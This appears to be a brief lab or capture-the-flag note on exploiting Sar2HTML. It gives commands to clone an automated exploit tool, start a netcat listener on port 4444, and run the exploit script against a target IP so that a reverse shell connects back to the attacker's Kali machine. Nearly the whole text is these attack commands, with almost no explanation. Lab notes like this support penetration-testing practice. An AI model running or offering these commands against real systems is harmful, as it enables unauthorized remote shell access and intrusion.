Sar2HTML
[1]Github repo for automated exploit
sudo git clone https://github.com/AssassinUKG/sar2HTML.git
[2]Target IP 192.168.101.161 kali IP:192.168.101.160
a) nc listener: nc -nvlp 4444
b) ./sar2HTMLshell.py -ip 192.168.101.161 -rip 192.168.101.160:4444 -pe sar2HTML
[3]Catch the shell
Last updated